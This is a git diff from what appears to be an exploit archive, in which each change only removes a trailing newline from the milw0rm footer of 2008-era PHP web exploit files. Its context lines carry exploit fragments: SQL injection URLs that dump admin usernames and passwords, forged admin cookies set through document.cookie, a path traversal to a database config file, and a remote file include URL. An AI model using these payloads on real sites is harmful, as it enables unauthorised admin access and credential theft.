-112,4 +112,4 @@ Good luck ! -------------------------------------------------------------------- -# milw0rm.com [2008-07-11] +# milw0rm.com [2008-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/6041.txt b/platforms/php/webapps/6041.txt index 1f2f99048..c8d956e6f 100755 --- a/platforms/php/webapps/6041.txt +++ b/platforms/php/webapps/6041.txt @@ -40,4 +40,4 @@ ####################################################################### -# milw0rm.com [2008-07-11] +# milw0rm.com [2008-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/6042.txt b/platforms/php/webapps/6042.txt index 40659a240..73cc1ed28 100755 --- a/platforms/php/webapps/6042.txt +++ b/platforms/php/webapps/6042.txt @@ -19,4 +19,4 @@ */ -# milw0rm.com [2008-10-20] +# milw0rm.com [2008-10-20] \ No newline at end of file diff --git a/platforms/php/webapps/6044.txt b/platforms/php/webapps/6044.txt index 76612c2a4..a9443ffa3 100755 --- a/platforms/php/webapps/6044.txt +++ b/platforms/php/webapps/6044.txt @@ -44,4 +44,4 @@ http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELEC Im IRAQi -# milw0rm.com [2008-07-11] +# milw0rm.com [2008-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/6047.txt b/platforms/php/webapps/6047.txt index 055104479..86f048852 100755 --- a/platforms/php/webapps/6047.txt +++ b/platforms/php/webapps/6047.txt @@ -14,4 +14,4 @@ javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; pa Note: The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6048.txt b/platforms/php/webapps/6048.txt index 50d7beae4..112d502b0 100755 --- a/platforms/php/webapps/6048.txt +++ b/platforms/php/webapps/6048.txt @@ -13,4 +13,4 @@ javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801 Note: The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6049.txt b/platforms/php/webapps/6049.txt index 2021bfcee..285c1cd98 100755 --- a/platforms/php/webapps/6049.txt +++ b/platforms/php/webapps/6049.txt @@ -14,4 +14,4 @@ javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a80 Note: The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6050.txt b/platforms/php/webapps/6050.txt index 20ad81978..e74687ae9 100755 --- a/platforms/php/webapps/6050.txt +++ b/platforms/php/webapps/6050.txt @@ -11,4 +11,4 @@ equals admin username. Exploit: javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/" -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6051.txt b/platforms/php/webapps/6051.txt index 52192b841..81a1183e0 100755 --- a/platforms/php/webapps/6051.txt +++ b/platforms/php/webapps/6051.txt @@ -14,4 +14,4 @@ javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; pa Note: The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6053.php b/platforms/php/webapps/6053.php index 8f121123b..30233b553 100755 --- a/platforms/php/webapps/6053.php +++ b/platforms/php/webapps/6053.php @@ -288,4 +288,4 @@ class phpreter ?> -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6054.pl b/platforms/php/webapps/6054.pl index 323a4a6b5..4f483c4cc 100755 --- a/platforms/php/webapps/6054.pl +++ b/platforms/php/webapps/6054.pl @@ -380,4 +380,4 @@ sub start } -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6055.pl b/platforms/php/webapps/6055.pl index d65672e79..6dac95c1f 100755 --- a/platforms/php/webapps/6055.pl +++ b/platforms/php/webapps/6055.pl @@ -96,4 +96,4 @@ sub istrue2 } } -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6056.txt b/platforms/php/webapps/6056.txt index 13285f45c..fd3918232 100755 --- a/platforms/php/webapps/6056.txt +++ b/platforms/php/webapps/6056.txt @@ -40,4 +40,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6057.txt b/platforms/php/webapps/6057.txt index 6222b970e..ac2dfedd6 100755 --- a/platforms/php/webapps/6057.txt +++ b/platforms/php/webapps/6057.txt @@ -49,4 +49,4 @@ Exploit: --==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6058.txt b/platforms/php/webapps/6058.txt index b1c419c1a..4cbad8ba2 100755 --- a/platforms/php/webapps/6058.txt +++ b/platforms/php/webapps/6058.txt @@ -51,4 +51,4 @@ SITE : cwh.citec.us Special Thx : asylu3, str0ke, citec.us, milw0rm.com ##################################################################### -# milw0rm.com [2008-07-12] +# milw0rm.com [2008-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/6060.php b/platforms/php/webapps/6060.php index c3b1ff413..567780767 100755 --- a/platforms/php/webapps/6060.php +++ b/platforms/php/webapps/6060.php @@ -441,4 +441,4 @@ class phpreter ?> -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6061.txt b/platforms/php/webapps/6061.txt index 516aae286..2ef0f708b 100755 --- a/platforms/php/webapps/6061.txt +++ b/platforms/php/webapps/6061.txt @@ -39,4 +39,4 @@ cookie exists. -[*]+ Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6062.txt b/platforms/php/webapps/6062.txt index cb9c7af3a..451a3627e 100755 --- a/platforms/php/webapps/6062.txt +++ b/platforms/php/webapps/6062.txt @@ -39,4 +39,4 @@ exists. -[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6063.txt b/platforms/php/webapps/6063.txt index ceaee91e3..49dbf66e2 100755 --- a/platforms/php/webapps/6063.txt +++ b/platforms/php/webapps/6063.txt @@ -39,4 +39,4 @@ exists. -[*]+ Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6064.txt b/platforms/php/webapps/6064.txt index 82d1f2ed3..44cfc40f4 100755 --- a/platforms/php/webapps/6064.txt +++ b/platforms/php/webapps/6064.txt @@ -39,4 +39,4 @@ exists. -[*]+ Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6065.txt b/platforms/php/webapps/6065.txt index cd8e6f362..fa236b371 100755 --- a/platforms/php/webapps/6065.txt +++ b/platforms/php/webapps/6065.txt @@ -39,4 +39,4 @@ exists. -[*]+ Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6066.txt b/platforms/php/webapps/6066.txt index 5c03ceee0..2f64cc071 100755 --- a/platforms/php/webapps/6066.txt +++ b/platforms/php/webapps/6066.txt @@ -39,4 +39,4 @@ exists. -[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6067.pl b/platforms/php/webapps/6067.pl index cc07c2bbe..b67f807a3 100755 --- a/platforms/php/webapps/6067.pl +++ b/platforms/php/webapps/6067.pl @@ -223,4 +223,4 @@ sub istrue2 } } -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6068.txt b/platforms/php/webapps/6068.txt index 5a157dd30..290abfd3b 100755 --- a/platforms/php/webapps/6068.txt +++ b/platforms/php/webapps/6068.txt @@ -57,4 +57,4 @@ with Administrative's Privilege. Special Thx : asylu3, str0ke, citec.us, milw0rm.com ##################################################################### -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6069.txt b/platforms/php/webapps/6069.txt index ebd566f58..6be493a3e 100755 --- a/platforms/php/webapps/6069.txt +++ b/platforms/php/webapps/6069.txt @@ -53,4 +53,4 @@ KoRn The Dog,Mini-Spider,All My Friends The EnD :D -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6070.php b/platforms/php/webapps/6070.php index ee4b30a74..4b296c3b0 100755 --- a/platforms/php/webapps/6070.php +++ b/platforms/php/webapps/6070.php @@ -66,4 +66,4 @@ echo 'Exploit Failed !'; ?> -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/6071.txt b/platforms/php/webapps/6071.txt index 4b39d5574..c9e2da29b 100755 --- a/platforms/php/webapps/6071.txt +++ b/platforms/php/webapps/6071.txt @@ -25,4 +25,4 @@ Proof of Concept : EoF. -# milw0rm.com [2008-07-14] +# milw0rm.com [2008-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/6073.txt b/platforms/php/webapps/6073.txt index 56442bddf..2763fe7a7 100755 --- a/platforms/php/webapps/6073.txt +++ b/platforms/php/webapps/6073.txt @@ -192,4 +192,4 @@ Black_H - blackh.eu http://blackh.eu/Advisories/Billboblog_2.1_Advisories.txt -# milw0rm.com [2008-07-14] +# milw0rm.com [2008-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/6074.txt b/platforms/php/webapps/6074.txt index abab691bf..6dd484a36 100755 --- a/platforms/php/webapps/6074.txt +++ b/platforms/php/webapps/6074.txt @@ -67,4 +67,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.comz -# milw0rm.com [2008-07-14] +# milw0rm.com [2008-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/6075.txt b/platforms/php/webapps/6075.txt index da6e3fcae..9c9931d40 100755 --- a/platforms/php/webapps/6075.txt +++ b/platforms/php/webapps/6075.txt @@ -65,4 +65,4 @@ print "[+] Usage: Perl $0 http://site.com\n"; } -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6076.txt b/platforms/php/webapps/6076.txt index 293b81724..bbaa5087d 100755 --- a/platforms/php/webapps/6076.txt +++ b/platforms/php/webapps/6076.txt @@ -42,4 +42,4 @@ http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c [!] bEST wISHES -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6078.txt b/platforms/php/webapps/6078.txt index 9ddd20426..a4aab66f4 100755 --- a/platforms/php/webapps/6078.txt +++ b/platforms/php/webapps/6078.txt @@ -35,4 +35,4 @@ Exploit : # ########################################################## -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6079.txt b/platforms/php/webapps/6079.txt index e7e4e9d0b..93e0fb58d 100755 --- a/platforms/php/webapps/6079.txt +++ b/platforms/php/webapps/6079.txt @@ -99,4 +99,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6080.txt b/platforms/php/webapps/6080.txt index 8041ff01a..ecda90e7d 100755 --- a/platforms/php/webapps/6080.txt +++ b/platforms/php/webapps/6080.txt @@ -33,4 +33,4 @@ # ####################################################### -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6081.txt b/platforms/php/webapps/6081.txt index 02cdee36e..0e314817b 100755 --- a/platforms/php/webapps/6081.txt +++ b/platforms/php/webapps/6081.txt @@ -41,4 +41,4 @@ now visit /admin and you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6082.txt b/platforms/php/webapps/6082.txt index d26f2b409..44543b5f7 100755 --- a/platforms/php/webapps/6082.txt +++ b/platforms/php/webapps/6082.txt @@ -47,4 +47,4 @@ thank u . # hackteach.org -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6084.txt b/platforms/php/webapps/6084.txt index 2ddf9c15a..81744ebf0 100755 --- a/platforms/php/webapps/6084.txt +++ b/platforms/php/webapps/6084.txt @@ -39,4 +39,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/6085.pl b/platforms/php/webapps/6085.pl index 17bbca862..fd9dbbd53 100755 --- a/platforms/php/webapps/6085.pl +++ b/platforms/php/webapps/6085.pl @@ -435,4 +435,4 @@ sub start } -# milw0rm.com [2008-07-16] +# milw0rm.com [2008-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/6086.txt b/platforms/php/webapps/6086.txt index e5f3769e6..7656ba4e0 100755 --- a/platforms/php/webapps/6086.txt +++ b/platforms/php/webapps/6086.txt @@ -20,4 +20,4 @@ ---------------------------------------------------------------------------- -# milw0rm.com [2008-07-16] +# milw0rm.com [2008-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/6087.txt b/platforms/php/webapps/6087.txt index 8ea55565e..f78647902 100755 --- a/platforms/php/webapps/6087.txt +++ b/platforms/php/webapps/6087.txt @@ -51,4 +51,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-16] +# milw0rm.com [2008-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/6088.txt b/platforms/php/webapps/6088.txt index 75a0d2ab8..7dce9ba8b 100755 --- a/platforms/php/webapps/6088.txt +++ b/platforms/php/webapps/6088.txt @@ -39,4 +39,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-16] +# milw0rm.com [2008-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/6091.txt b/platforms/php/webapps/6091.txt index 4168b70d8..d9de56e8e 100755 --- a/platforms/php/webapps/6091.txt +++ b/platforms/php/webapps/6091.txt @@ -36,4 +36,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/6092.txt b/platforms/php/webapps/6092.txt index c7104a12b..59fdb8308 100755 --- a/platforms/php/webapps/6092.txt +++ b/platforms/php/webapps/6092.txt @@ -84,4 +84,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/6095.pl b/platforms/php/webapps/6095.pl index c9568fdfa..72662c2b0 100755 --- a/platforms/php/webapps/6095.pl +++ b/platforms/php/webapps/6095.pl @@ -52,4 +52,4 @@ sub inject_test { } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; } } -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/6096.txt b/platforms/php/webapps/6096.txt index ee2610405..f3f188e73 100755 --- a/platforms/php/webapps/6096.txt +++ b/platforms/php/webapps/6096.txt @@ -35,4 +35,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/6097.txt b/platforms/php/webapps/6097.txt index c2782c943..465f7e917 100755 --- a/platforms/php/webapps/6097.txt +++ b/platforms/php/webapps/6097.txt @@ -30,4 +30,4 @@ SQL : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arc -------------------------------------------[End of context]---------------------------------------- thanx str0ke/* -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/6098.txt b/platforms/php/webapps/6098.txt index 4ac250cbf..a80c43119 100755 --- a/platforms/php/webapps/6098.txt +++ b/platforms/php/webapps/6098.txt @@ -36,4 +36,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-18] +# milw0rm.com [2008-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/6099.txt b/platforms/php/webapps/6099.txt index d8337953c..21a5bd3b2 100755 --- a/platforms/php/webapps/6099.txt +++ b/platforms/php/webapps/6099.txt @@ -31,4 +31,4 @@ ############And personally to Nilson ;)############ ################################################### -# milw0rm.com [2008-07-18] +# milw0rm.com [2008-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/6102.txt b/platforms/php/webapps/6102.txt index 577c490cb..6c47e9d6c 100755 --- a/platforms/php/webapps/6102.txt +++ b/platforms/php/webapps/6102.txt @@ -36,4 +36,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-20] +# milw0rm.com [2008-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/6107.txt b/platforms/php/webapps/6107.txt index aa60ba911..573c80524 100755 --- a/platforms/php/webapps/6107.txt +++ b/platforms/php/webapps/6107.txt @@ -62,4 +62,4 @@ About Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/6112.txt b/platforms/php/webapps/6112.txt index aeedb40ce..948996101 100755 --- a/platforms/php/webapps/6112.txt +++ b/platforms/php/webapps/6112.txt @@ -25,4 +25,4 @@ All Members Real Hack And All My Friends .. Found by : Ghost Hacker [ R-H TeaM ] ################################################################################################## -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/6113.pl b/platforms/php/webapps/6113.pl index fd1fb30f3..c2b9e0657 100755 --- a/platforms/php/webapps/6113.pl +++ b/platforms/php/webapps/6113.pl @@ -84,4 +84,4 @@ close($sock); # ldma[2008-07-19] -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/6114.txt b/platforms/php/webapps/6114.txt index 742c259ee..2372ccb8a 100755 --- a/platforms/php/webapps/6114.txt +++ b/platforms/php/webapps/6114.txt @@ -13,4 +13,4 @@ Greatz : aLL My Friend'Z and str0ke ========================================From Turkey============================================= -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/6115.txt b/platforms/php/webapps/6115.txt index bbd418211..cccc17de9 100755 --- a/platforms/php/webapps/6115.txt +++ b/platforms/php/webapps/6115.txt @@ -47,4 +47,4 @@ now you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/6117.txt b/platforms/php/webapps/6117.txt index 1261bbcb7..360cd186a 100755 --- a/platforms/php/webapps/6117.txt +++ b/platforms/php/webapps/6117.txt @@ -53,4 +53,4 @@ ______ !! This is just for educational purposes, DO NOT use for illegal. !! -# milw0rm.com [2008-07-22] +# milw0rm.com [2008-07-22] \ No newline at end of file diff --git a/platforms/php/webapps/6125.txt b/platforms/php/webapps/6125.txt index cf187cd9f..6db22ba41 100755 --- a/platforms/php/webapps/6125.txt +++ b/platforms/php/webapps/6125.txt @@ -35,4 +35,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-24] +# milw0rm.com [2008-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/6126.txt b/platforms/php/webapps/6126.txt index 279b30448..57fff4db1 100755 --- a/platforms/php/webapps/6126.txt +++ b/platforms/php/webapps/6126.txt @@ -8,4 +8,4 @@ http://[site]/ibase/zubehoer/download.php?filename=[file] Database config: http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php -# milw0rm.com [2008-07-24] +# milw0rm.com [2008-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/6127.htm b/platforms/php/webapps/6127.htm index 35190255d..fa808ea5a 100755 --- a/platforms/php/webapps/6127.htm +++ b/platforms/php/webapps/6127.htm @@ -18,4 +18,4 @@ -# milw0rm.com [2008-07-24] +# milw0rm.com [2008-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/6128.txt b/platforms/php/webapps/6128.txt index 4f1627146..70f2050d5 100755 --- a/platforms/php/webapps/6128.txt +++ b/platforms/php/webapps/6128.txt @@ -33,4 +33,4 @@ ############################################################################# -# milw0rm.com [2008-07-24] +# milw0rm.com [2008-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/6131.txt b/platforms/php/webapps/6131.txt index d53115017..1b02d1e6e 100755 --- a/platforms/php/webapps/6131.txt +++ b/platforms/php/webapps/6131.txt @@ -22,4 +22,4 @@ Information Gathering ############################################################## -# milw0rm.com [2008-07-25] +# milw0rm.com [2008-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/6132.txt b/platforms/php/webapps/6132.txt index 1960e20d4..f78041fea 100755 --- a/platforms/php/webapps/6132.txt +++ b/platforms/php/webapps/6132.txt @@ -16,4 +16,4 @@ #greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P -# milw0rm.com [2008-07-25] +# milw0rm.com [2008-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/6133.txt b/platforms/php/webapps/6133.txt index 3b20871e7..29c58eda0 100755 --- a/platforms/php/webapps/6133.txt +++ b/platforms/php/webapps/6133.txt @@ -35,4 +35,4 @@ http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-25] +# milw0rm.com [2008-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/6134.txt b/platforms/php/webapps/6134.txt index 27d3567a5..732377fab 100755 --- a/platforms/php/webapps/6134.txt +++ b/platforms/php/webapps/6134.txt @@ -30,4 +30,4 @@ Exploit : http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/* -# milw0rm.com [2008-07-25] +# milw0rm.com [2008-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/6136.txt b/platforms/php/webapps/6136.txt index b8b9d5783..4ba62c48a 100755 --- a/platforms/php/webapps/6136.txt +++ b/platforms/php/webapps/6136.txt @@ -64,4 +64,4 @@ now you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6137.txt b/platforms/php/webapps/6137.txt index b50486e21..bdeb0c0f2 100755 --- a/platforms/php/webapps/6137.txt +++ b/platforms/php/webapps/6137.txt @@ -312,4 +312,4 @@ sub banner print "\n\n"; } -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6138.txt b/platforms/php/webapps/6138.txt index 98cd16c3f..2ab9463ef 100755 --- a/platforms/php/webapps/6138.txt +++ b/platforms/php/webapps/6138.txt @@ -32,4 +32,4 @@ ******************************************************************************************* -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6139.txt b/platforms/php/webapps/6139.txt index b3627f19f..4d079df21 100755 --- a/platforms/php/webapps/6139.txt +++ b/platforms/php/webapps/6139.txt @@ -23,4 +23,4 @@ Live Examples; http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin-- http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin-- -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6140.txt b/platforms/php/webapps/6140.txt index 569d1a76d..f9da00d62 100755 --- a/platforms/php/webapps/6140.txt +++ b/platforms/php/webapps/6140.txt @@ -35,4 +35,4 @@ #End -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6141.txt b/platforms/php/webapps/6141.txt index b2698683a..51f709ec9 100755 --- a/platforms/php/webapps/6141.txt +++ b/platforms/php/webapps/6141.txt @@ -32,4 +32,4 @@ ******************************************************************************************* -# milw0rm.com [2008-07-26] +# milw0rm.com [2008-07-26] \ No newline at end of file diff --git a/platforms/php/webapps/6142.txt b/platforms/php/webapps/6142.txt index 6a6905cd6..b3651c710 100755 --- a/platforms/php/webapps/6142.txt +++ b/platforms/php/webapps/6142.txt @@ -23,4 +23,4 @@ # Site : Http://IRCRASH.COM # ################################ TNX GOD ############################################ -# milw0rm.com [2008-07-27] +# milw0rm.com [2008-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/6143.txt b/platforms/php/webapps/6143.txt index fec1072ca..cf76ee9fd 100755 --- a/platforms/php/webapps/6143.txt +++ b/platforms/php/webapps/6143.txt @@ -48,4 +48,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-27] +# milw0rm.com [2008-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/6144.txt b/platforms/php/webapps/6144.txt index 5103e1b00..179ad6446 100755 --- a/platforms/php/webapps/6144.txt +++ b/platforms/php/webapps/6144.txt @@ -54,4 +54,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-27] +# milw0rm.com [2008-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/6145.txt b/platforms/php/webapps/6145.txt index 736a3c7c7..a220a54bb 100755 --- a/platforms/php/webapps/6145.txt +++ b/platforms/php/webapps/6145.txt @@ -14,4 +14,4 @@ Thanks : aLL My Friend'Z ================From Turkey==================== -# milw0rm.com [2008-07-27] +# milw0rm.com [2008-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/6146.txt b/platforms/php/webapps/6146.txt index 5bc28a3ef..6944ffeb5 100755 --- a/platforms/php/webapps/6146.txt +++ b/platforms/php/webapps/6146.txt @@ -73,4 +73,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6147.txt b/platforms/php/webapps/6147.txt index 94388c448..f4fdadefa 100755 --- a/platforms/php/webapps/6147.txt +++ b/platforms/php/webapps/6147.txt @@ -51,4 +51,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6148.txt b/platforms/php/webapps/6148.txt index 6ffc54da9..b84fe6110 100755 --- a/platforms/php/webapps/6148.txt +++ b/platforms/php/webapps/6148.txt @@ -33,4 +33,4 @@ ============================================================================================================= -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6149.txt b/platforms/php/webapps/6149.txt index a134339d9..1cf943006 100755 --- a/platforms/php/webapps/6149.txt +++ b/platforms/php/webapps/6149.txt @@ -68,4 +68,4 @@ vulnerability reports, advisories and whitepapers posted regularly on our websit Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6150.txt b/platforms/php/webapps/6150.txt index 7df574e0e..1e4e526d3 100755 --- a/platforms/php/webapps/6150.txt +++ b/platforms/php/webapps/6150.txt @@ -88,4 +88,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6153.txt b/platforms/php/webapps/6153.txt index d8736fb06..0fdd1b084 100755 --- a/platforms/php/webapps/6153.txt +++ b/platforms/php/webapps/6153.txt @@ -28,4 +28,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6154.txt b/platforms/php/webapps/6154.txt index 52413df46..3bbc6c125 100755 --- a/platforms/php/webapps/6154.txt +++ b/platforms/php/webapps/6154.txt @@ -63,4 +63,4 @@ Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00118-07292008 -# 